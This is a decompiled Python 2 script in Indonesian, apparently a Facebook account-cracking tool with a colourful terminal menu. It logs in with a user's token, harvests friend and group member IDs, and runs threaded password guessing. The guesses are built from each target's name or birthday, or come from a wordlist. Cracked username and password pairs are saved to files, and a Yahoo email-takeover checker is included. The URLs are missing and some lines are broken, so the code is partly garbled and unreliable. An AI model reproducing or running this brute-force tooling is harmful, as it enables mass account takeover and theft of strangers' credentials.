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#decompiled by PDM31 import os, sys print '\x1b[1;32mSudah punya ID dan Password nya?' print '\x1b[1;32mSilahkan Login ' import os, sys def wa(): os.system('xdg-open') def restart(): ngulang = sys.executable os.execl(ngulang, ngulang, *sys.argv) user = raw_input('ID: ') import getpass sandi = raw_input('Password: ') if sandi == 'indoxploit' and user == 'Borot': print 'Anda Telah Login' sys.exit else: print 'Login GAGAL, Silahkan hubungi ADMIN' wa() restart() import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib from multiprocessing.pool import ThreadPool try: import mechanize except ImportError: os.system('pip2 install mechanize') else: try: import requests except ImportError: os.system('pip2 install requests') from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Keluar' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.1) logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.7\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mMr. Borot\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mKunjungi\x1b[1;97m \x1b[1;96mwebsite \x1b[1;96mKami\n\x1b[1;93m* \x1b[1;97mwebsite \x1b[1;91m: \x1b[1;92m\x1b[4m\x1b[0m\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idteman = [] idfromteman = [] idmem = [] id = [] em = [] emfromteman = [] hp = [] hpfromteman = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('reset') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ') tik() try:'') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x ='md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = '' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil''' + z['access_token']) os.system('xdg-open') time.sleep(2) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) keluar() else: print '\n\x1b[1;91m[!] Login Gagal' os.system('rm -rf login.txt') time.sleep(1) login() def menu(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: os.system('reset') print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: otw = requests.get('' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] except KeyError: os.system('reset') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Tidak ada koneksi' keluar() os.system('reset') print logo print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90' print '\x1b[1;37;40m1. Informasi Pengguna' print '\x1b[1;37;40m2. Hack Akun Facebook' print '\x1b[1;37;40m3. Bot ' print '\x1b[1;37;40m4. Lainnya.... ' print '\x1b[1;37;40m5. LogOut ' print '\x1b[1;31;40m0. Keluar ' print pilih() def pilih(): zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Jangan kosong' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('rm -rf login.txt') os.system('xdg-open') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada' pilih() def informasi(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 40 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mTidak ada' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() def menu_hack(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m2. Multi Bruteforce Facebook' print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m5. Yahoo Checker' print '\x1b[1;37;40m6. Ambil id/email/hp' print '\x1b[1;31;40m0. Kembali' print hack_pilih() def hack_pilih(): hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] Jangan kosong' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada' hack_pilih() def mini(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if '' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if '' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if '' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if '' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Maaf, gagal membuka password target :(' print '\x1b[1;91m[!] Cobalah dengan cara lain.' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = while file: username = file.readline().strip() url = '' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if '' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Koneksi terganggu' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' def hasil(): print print 40 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Crack dari daftar Teman' print '\x1b[1;37;40m2. Crack dari member Grup' print '\x1b[1;31;40m0. Kembali' print pilih_super() def pilih_super(): peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Jangan kosong' pilih_super() else: if peak == '1': os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...') r = requests.get('' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() re = requests.get('' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) print print 40 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1 else: if '' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1 else: pass2 = b['first_name'] + '12345' data = urllib.urlopen('' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2 else: if '' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2 else: pass3 = b['last_name'] + '123' data = urllib.urlopen('' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3 else: if '' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3 else: lahir = b['birthday'] pass4 = lahir.replace('/', '') data = urllib.urlopen('' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4 else: if '' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4 except: pass p = ThreadPool(30), id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() def brute(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if '' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File tidak ditemukan...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Dari teman facebook' print '\x1b[1;37;40m2. Gunakan File' print '\x1b[1;31;40m0. Kembali' print yahoo_pilih() def yahoo_pilih(): go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Jangan kosong' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada' yahoo_pilih() def yahoofriends(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') teman = requests.get('' + toket) kimak = json.loads(teman.text) save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = if '' in otw:'') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 40 * '\x1b[1;97m\xe2\x95\x90' print 